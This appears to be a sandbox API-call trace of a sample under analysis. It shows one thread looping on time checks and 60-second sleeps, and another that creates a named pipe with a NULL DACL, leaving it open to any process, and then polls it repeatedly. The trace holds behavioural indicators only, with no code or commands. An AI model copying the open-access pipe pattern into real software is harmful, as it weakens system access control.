	[0256.745] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x80a50840, dwHighDateTime=0x1d50a6a)) 
	[0256.745] Sleep (dwMilliseconds=0xea60) 
	[0256.762] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x80a769a0, dwHighDateTime=0x1d50a6a)) 
	[0256.762] Sleep (dwMilliseconds=0xea60) 
	[0256.777] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x80a9cb00, dwHighDateTime=0x1d50a6a)) 
	[0256.777] Sleep (dwMilliseconds=0xea60) 
	[0256.792] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x80ac2c60, dwHighDateTime=0x1d50a6a)) 
	[0256.792] Sleep (dwMilliseconds=0xea60) 
	[0256.808] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x80ae8dc0, dwHighDateTime=0x1d50a6a)) 
	[0256.808] Sleep (dwMilliseconds=0xea60) 
	[0256.824] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x80b0ef20, dwHighDateTime=0x1d50a6a)) 
	[0256.824] Sleep (dwMilliseconds=0xea60) 
	[0256.839] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x80b35080, dwHighDateTime=0x1d50a6a)) 
	[0256.839] Sleep (dwMilliseconds=0xea60) 
	[0256.855] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x80b5b1e0, dwHighDateTime=0x1d50a6a)) 
	[0256.855] Sleep (dwMilliseconds=0xea60) 
	[0256.870] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x80b81340, dwHighDateTime=0x1d50a6a)) 
	[0256.870] Sleep (dwMilliseconds=0xea60) 
	[0256.887] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x80ba74a0, dwHighDateTime=0x1d50a6a)) 
	[0256.887] Sleep (dwMilliseconds=0xea60) 
	[0256.902] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x80bcd600, dwHighDateTime=0x1d50a6a)) 
	[0256.902] Sleep (dwMilliseconds=0xea60) 
	[0256.917] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x80bf3760, dwHighDateTime=0x1d50a6a)) 
	[0256.917] Sleep (dwMilliseconds=0xea60) 

Thread:
	id = 173
	os_tid = 0xa34

	[0188.660] ConvertStringSecurityDescriptorToSecurityDescriptorA () returned 0x0
	[0188.661] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x774c0000
	[0188.661] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x108fa5c, dwRevision=0x1 | out: pSecurityDescriptor=0x108fa5c) returned 1
	[0188.661] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x774c0000
	[0188.661] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x108fa5c, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x108fa5c) returned 1
	[0188.661] lstrlenA (lpString="3128") returned 4
	[0188.661] CreateNamedPipeA (lpName="\\\\.\\pipe\\3128lacesomepipe" (normalized: "\\device\\namedpipe\\3128lacesomepipe"), dwOpenMode=0x3, dwPipeMode=0x0, nMaxInstances=0x1, nOutBufferSize=0x4000, nInBufferSize=0x4000, nDefaultTimeOut=0x0, lpSecurityAttributes=0x108fa78) returned 0x240
	[0188.661] WriteFile (in: hFile=0x240, lpBuffer=0x108f208, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x108f200, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x108f200, lpOverlapped=0x0) returned 0
	[0188.661] Sleep (dwMilliseconds=0xa) 
	[0188.667] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0188.667] GetLastError () returned 0x218
	[0188.667] Sleep (dwMilliseconds=0xa) 
	[0188.683] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0188.683] GetLastError () returned 0x218
	[0188.683] Sleep (dwMilliseconds=0xa) 
	[0188.726] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0188.726] GetLastError () returned 0x218
	[0188.726] Sleep (dwMilliseconds=0xa) 
	[0188.731] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0188.731] GetLastError () returned 0x218
	[0188.731] Sleep (dwMilliseconds=0xa) 
	[0188.745] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0188.745] GetLastError () returned 0x218
	[0188.745] Sleep (dwMilliseconds=0xa) 
	[0188.761] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0188.761] GetLastError () returned 0x218
	[0188.762] Sleep (dwMilliseconds=0xa) 
	[0188.777] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0188.777] GetLastError () returned 0x218
	[0188.777] Sleep (dwMilliseconds=0xa) 
	[0188.793] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0188.793] GetLastError () returned 0x218
	[0188.793] Sleep (dwMilliseconds=0xa) 
	[0188.808] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0188.808] GetLastError () returned 0x218
	[0188.808] Sleep (dwMilliseconds=0xa) 
	[0188.824] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0188.824] GetLastError () returned 0x218
	[0188.824] Sleep (dwMilliseconds=0xa) 
	[0188.839] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0188.839] GetLastError () returned 0x218
	[0188.840] Sleep (dwMilliseconds=0xa) 
	[0188.856] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0188.856] GetLastError () returned 0x218
	[0188.856] Sleep (dwMilliseconds=0xa) 
	[0188.871] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0188.871] GetLastError () returned 0x218
	[0188.871] Sleep (dwMilliseconds=0xa) 
	[0188.887] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0188.887] GetLastError () returned 0x218
	[0188.887] Sleep (dwMilliseconds=0xa) 
	[0188.903] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0188.904] GetLastError () returned 0x218
	[0188.904] Sleep (dwMilliseconds=0xa) 
	[0188.917] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0188.918] GetLastError () returned 0x218
	[0188.918] Sleep (dwMilliseconds=0xa) 
	[0188.945] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0188.945] GetLastError () returned 0x218
	[0188.945] Sleep (dwMilliseconds=0xa) 
	[0188.948] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0188.948] GetLastError () returned 0x218
	[0188.948] Sleep (dwMilliseconds=0xa) 
	[0188.964] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0188.964] GetLastError () returned 0x218
	[0188.964] Sleep (dwMilliseconds=0xa) 
	[0188.981] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0188.981] GetLastError () returned 0x218
	[0188.981] Sleep (dwMilliseconds=0xa) 
	[0188.995] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0188.995] GetLastError () returned 0x218
	[0188.995] Sleep (dwMilliseconds=0xa) 
	[0189.011] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.011] GetLastError () returned 0x218
	[0189.011] Sleep (dwMilliseconds=0xa) 
	[0189.026] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.026] GetLastError () returned 0x218
	[0189.027] Sleep (dwMilliseconds=0xa) 
	[0189.042] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.042] GetLastError () returned 0x218
	[0189.042] Sleep (dwMilliseconds=0xa) 
	[0189.060] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.060] GetLastError () returned 0x218
	[0189.061] Sleep (dwMilliseconds=0xa) 
	[0189.073] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.073] GetLastError () returned 0x218
	[0189.074] Sleep (dwMilliseconds=0xa) 
	[0189.089] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.089] GetLastError () returned 0x218
	[0189.089] Sleep (dwMilliseconds=0xa) 
	[0189.104] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.104] GetLastError () returned 0x218
	[0189.105] Sleep (dwMilliseconds=0xa) 
	[0189.120] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.120] GetLastError () returned 0x218
	[0189.120] Sleep (dwMilliseconds=0xa) 
	[0189.135] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.135] GetLastError () returned 0x218
	[0189.136] Sleep (dwMilliseconds=0xa) 
	[0189.151] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.151] GetLastError () returned 0x218
	[0189.151] Sleep (dwMilliseconds=0xa) 
	[0189.167] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.167] GetLastError () returned 0x218
	[0189.168] Sleep (dwMilliseconds=0xa) 
	[0189.187] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.187] GetLastError () returned 0x218
	[0189.187] Sleep (dwMilliseconds=0xa) 
	[0189.198] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.198] GetLastError () returned 0x218
	[0189.198] Sleep (dwMilliseconds=0xa) 
	[0189.214] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.214] GetLastError () returned 0x218
	[0189.214] Sleep (dwMilliseconds=0xa) 
	[0189.231] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.231] GetLastError () returned 0x218
	[0189.231] Sleep (dwMilliseconds=0xa) 
	[0189.252] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.252] GetLastError () returned 0x218
	[0189.252] Sleep (dwMilliseconds=0xa) 
	[0189.260] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.260] GetLastError () returned 0x218
	[0189.260] Sleep (dwMilliseconds=0xa) 
	[0189.276] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.276] GetLastError () returned 0x218
	[0189.276] Sleep (dwMilliseconds=0xa) 
	[0189.292] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.292] GetLastError () returned 0x218
	[0189.292] Sleep (dwMilliseconds=0xa) 
	[0189.308] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.308] GetLastError () returned 0x218
	[0189.308] Sleep (dwMilliseconds=0xa) 
	[0189.323] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.323] GetLastError () returned 0x218
	[0189.324] Sleep (dwMilliseconds=0xa) 
	[0189.339] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.339] GetLastError () returned 0x218
	[0189.339] Sleep (dwMilliseconds=0xa) 
	[0189.354] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.354] GetLastError () returned 0x218
	[0189.354] Sleep (dwMilliseconds=0xa) 
	[0189.371] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.371] GetLastError () returned 0x218
	[0189.371] Sleep (dwMilliseconds=0xa) 
	[0189.385] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.386] GetLastError () returned 0x218
	[0189.386] Sleep (dwMilliseconds=0xa) 
	[0189.402] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.402] GetLastError () returned 0x218
	[0189.402] Sleep (dwMilliseconds=0xa) 
	[0189.416] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.417] GetLastError () returned 0x218
	[0189.417] Sleep (dwMilliseconds=0xa) 
	[0189.432] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.432] GetLastError () returned 0x218
	[0189.432] Sleep (dwMilliseconds=0xa) 
	[0189.448] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.448] GetLastError () returned 0x218
	[0189.448] Sleep (dwMilliseconds=0xa) 
	[0189.465] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.465] GetLastError () returned 0x218
	[0189.465] Sleep (dwMilliseconds=0xa) 
	[0189.501] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.501] GetLastError () returned 0x218
	[0189.501] Sleep (dwMilliseconds=0xa) 
	[0189.509] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.510] GetLastError () returned 0x218
	[0189.510] Sleep (dwMilliseconds=0xa) 
	[0189.525] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.525] GetLastError () returned 0x218
	[0189.526] Sleep (dwMilliseconds=0xa) 
	[0189.541] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.541] GetLastError () returned 0x218
	[0189.541] Sleep (dwMilliseconds=0xa) 
	[0189.557] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.557] GetLastError () returned 0x218
	[0189.557] Sleep (dwMilliseconds=0xa) 
	[0189.572] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.573] GetLastError () returned 0x218
	[0189.573] Sleep (dwMilliseconds=0xa) 
	[0189.588] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.588] GetLastError () returned 0x218
	[0189.588] Sleep (dwMilliseconds=0xa) 
	[0189.605] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.605] GetLastError () returned 0x218
	[0189.605] Sleep (dwMilliseconds=0xa) 
	[0189.620] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.620] GetLastError () returned 0x218
	[0189.620] Sleep (dwMilliseconds=0xa) 
	[0189.634] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.634] GetLastError () returned 0x218
	[0189.634] Sleep (dwMilliseconds=0xa) 
	[0189.650] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.650] GetLastError () returned 0x218
	[0189.650] Sleep (dwMilliseconds=0xa) 
	[0189.665] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.665] GetLastError () returned 0x218
	[0189.665] Sleep (dwMilliseconds=0xa) 
	[0189.681] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.681] GetLastError () returned 0x218
	[0189.681] Sleep (dwMilliseconds=0xa) 
	[0189.708] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.708] GetLastError () returned 0x218
	[0189.708] Sleep (dwMilliseconds=0xa) 
	[0189.712] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.712] GetLastError () returned 0x218
	[0189.712] Sleep (dwMilliseconds=0xa) 
	[0189.730] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.730] GetLastError () returned 0x218
	[0189.730] Sleep (dwMilliseconds=0xa) 
